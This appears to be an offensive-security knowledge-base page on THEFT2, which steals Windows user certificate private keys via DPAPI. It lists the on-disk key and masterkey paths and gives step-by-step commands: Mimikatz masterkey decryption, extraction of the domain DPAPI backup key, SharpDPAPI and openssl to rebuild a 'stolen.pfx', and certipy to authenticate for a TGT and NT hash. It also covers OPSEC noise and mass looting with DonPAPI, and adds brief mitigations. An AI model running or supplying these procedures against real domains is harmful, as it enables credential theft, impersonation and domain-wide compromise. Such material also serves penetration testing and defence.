theft2-user-certificate-theft-via-dpapi.md (4312B)
1 --- 2 title: "THEFT2 — User Certificate Theft via DPAPI" 3 description: "Windows protects user certificate private keys with DPAPI (Data Protection API). The encrypted key blobs live on disk; decrypting them normally requires…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "hashing"] 7 tools: ["Mimikatz", "Certipy", "OpenSSL", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/THEFT2 — User Certificate Theft via DPAPI.md" 11 --- 12 # THEFT2 — User Certificate Theft via DPAPI 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Credential Theft (local, DPAPI) | 19 | **Difficulty** | Medium | 20 | **Pre-requisites** | Access as the user (or their password/hash, or the domain DPAPI backup key) | 21 | **Tools** | SharpDPAPI, Mimikatz, Certipy, DonPAPI | 22 | **OPSEC Noise** | Low — file reads + offline decryption | 23 | **One-liner** | Decrypt a user's certificate private keys straight from the DPAPI-protected files on disk, without going through the certificate-store export APIs. | 24 25 *** 26 27 ## What Is THEFT2? 28 29 Windows protects user certificate private keys with **DPAPI** (Data Protection API). The encrypted key blobs live on disk; decrypting them normally requires the user's logon secret. If you can read those files **and** obtain the DPAPI masterkey (via the user's password/NT hash, an existing logon session, or the domain's DPAPI backup key), you recover the private key offline, even when THEFT1's export APIs are blocked. 30 31 **Key locations (per user):** 32 33 ``` 34 Private keys : %APPDATA%\Microsoft\Crypto\RSA\<SID>\ 35 %APPDATA%\Microsoft\Crypto\Keys\ (CNG) 36 Masterkeys : %APPDATA%\Microsoft\Protect\<SID>\ 37 Certificates : %APPDATA%\Microsoft\SystemCertificates\My\Certificates\ 38 ``` 39 40 *** 41 42 ## Step 1 — Decrypt the Masterkey 43 44 ```powershell 45 # From a live session as the user (Mimikatz auto-uses the logon secret) 46 mimikatz # dpapi::masterkey /in:"%APPDATA%\Microsoft\Protect\<SID>\<GUID>" /rpc 47 48 # With the user's password or NT hash (offline) 49 mimikatz # dpapi::masterkey /in:<masterkeyfile> /sid:<SID> /password:Passw0rd! 50 mimikatz # dpapi::masterkey /in:<masterkeyfile> /sid:<SID> /hash:<NTHASH> 51 ``` 52 53 > [!tip] Domain DPAPI backup key = master skeleton 54 > If you are Domain Admin, extract the domain DPAPI backup key once (`lsadump::backupkeys /system:DC01 /export`) and decrypt **any** user's masterkeys forever: `dpapi::masterkey /in:<mk> /pvk:backupkey.pvk`. 55 56 *** 57 58 ## Step 2 — Decrypt the Private Key + Rebuild the PFX 59 60 ```powershell 61 # One-shot: SharpDPAPI finds certs, decrypts masterkeys, outputs .pem/.pfx 62 SharpDPAPI.exe certificates /mkfile:masterkeys.txt # provide decrypted masterkeys 63 SharpDPAPI.exe certificates /pvk:backupkey.pvk # or the domain backup key 64 ``` 65 66 ```powershell 67 # Mimikatz manual path 68 mimikatz # dpapi::capi /in:"%APPDATA%\Microsoft\Crypto\RSA\<SID>\<keyfile>" 69 # combine the recovered key with the public cert into a pfx with openssl 70 ``` 71 72 ```bash 73 # openssl: stitch the decrypted key + cert into a usable pfx 74 openssl pkcs12 -export -inkey stolen.key -in stolen.crt -out stolen.pfx 75 ``` 76 77 *** 78 79 ## Step 3 — Authenticate 80 81 ```bash 82 certipy-ad auth -pfx stolen.pfx -dc-ip $TARGET # PKINIT -> TGT + NT hash 83 ``` 84 85 > [!tip] DonPAPI / Certipy remote 86 > `DonPAPI` automates remote DPAPI cert looting across many hosts. Handy when sweeping a subnet after gaining a domain foothold. 87 88 *** 89 90 ## OPSEC Considerations 91 92 | Action | Artefact | Noise | 93 | :-- | :-- | :-- | 94 | Reading Crypto/Protect files | file access events (if audited) | 🟢 Low | 95 | Offline masterkey decryption | none (off-host) | 🟢 Low | 96 | `lsadump::backupkeys` on DC | LSASS access on DC | 🔴 High | 97 98 *** 99 100 ## Mitigation 101 102 - Protect keys with TPM/HSM so DPAPI blobs alone are useless. 103 - Rotate the **domain DPAPI backup key** if DA compromise is suspected (non-trivial). 104 - Limit lateral movement so attackers cannot read other users' profiles. 105 - Monitor DC access to `lsadump::backupkeys` behaviour and mass profile reads. 106 107 *** 108 109 ## See Also 110 111 - _ADCS Attack Methodology Guide · THEFT1 — Exporting Certificates and Keys · THEFT3 — Machine Certificate Theft via DPAPI 112 - Sources: SpecterOps *Certified Pre-Owned*; [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)